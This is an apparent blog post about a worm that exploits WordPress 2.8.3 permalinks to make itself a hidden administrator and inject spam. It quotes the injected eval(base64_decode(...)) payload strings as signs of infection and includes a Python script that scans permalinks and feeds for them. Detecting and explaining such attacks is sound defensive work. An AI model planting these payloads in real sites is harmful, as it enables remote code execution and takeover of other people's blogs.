A month ago, a new critical vulnerability in WordPress 2.8.3 became known, which allows the administrator password to be changed remotely with ease. WordPress 2.8.4 was released immediately, eliminating this vulnerability. As it turned out, not all bloggers follow updates.
This weekend, a real outbreak of a new virus erupted, hitting blogs on WordPress 2.8.3 and earlier in the 2.8 branch. The worm registers on the blog, runs malicious code through the permalink structure and makes itself a second administrator, then runs a script to erase itself from the users page and begins to quietly add spam and links to malicious content to archived posts.
The worm's presence is quite difficult to detect right away, especially if it has not yet published anything. To detect it, check the permalinks / RSS feed for the following code.
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
or
')
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
or errors such as
'error on line 22 at column 71: xmlParseEntityRef: no name wordpress'
If such code is present or the feed is broken, then the blog is infected.
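The check described above can be scripted. This is an added example, not code from the original post; it assumes you have copied the blog's permalink structure setting and the fetched feed body into strings, and the function names, sample inputs and the blog.example host are constructed for illustration.

```python
import re
from urllib.parse import unquote
from xml.etree import ElementTree

# The PHP fragment shared by both strings above, once percent-encoding is undone.
INJECTED = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*\$_SERVER\s*\[\s*HTTP_\w+", re.I)

def has_injected_code(text):
    """True if text carries the fragment, raw or percent-encoded."""
    return bool(INJECTED.search(text) or INJECTED.search(unquote(text)))

def feed_is_broken(feed_xml):
    """True if the feed is not well-formed XML (the kind of parse error quoted above)."""
    try:
        ElementTree.fromstring(feed_xml)
    except ElementTree.ParseError:
        return True
    return False

def check_blog(permalink_structure, feed_xml):
    """Return a list of findings; an empty list means no sign of the worm."""
    findings = []
    if has_injected_code(permalink_structure):
        findings.append("permalink structure contains injected code")
    if has_injected_code(feed_xml):
        findings.append("feed contains injected code")
    if feed_is_broken(feed_xml):
        findings.append("feed is not well-formed XML")
    return findings

# Constructed sample inputs (blog.example is a placeholder host).
CLEAN_PERMALINK = "/%year%/%monthnum%/%postname%/"
INFECTED_PERMALINK = CLEAN_PERMALINK + r"%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/"
CLEAN_FEED = ("<rss version='2.0'><channel><title>Blog</title>"
              "<link>http://blog.example/2009/09/post/</link></channel></rss>")
INFECTED_FEED = CLEAN_FEED.replace(
    "/2009/09/post/",
    "/2009/09/post/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%/")

if __name__ == "__main__":
    for name, args in [("clean", (CLEAN_PERMALINK, CLEAN_FEED)),
                       ("infected", (INFECTED_PERMALINK, INFECTED_FEED))]:
        print(name, check_blog(*args) or "no findings")
```

A clean result only means these particular signs are absent; it does not rule out a second administrator account that the worm has already hidden.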
Removing the worm is a nontrivial task.
By the way, Matt Mullenweg published a long article on the topic of security, in which he urged users to constantly watch for and install the latest updates; there are also instructions on how to upgrade WordPress. This is the only way to protect yourself from this and future epidemics.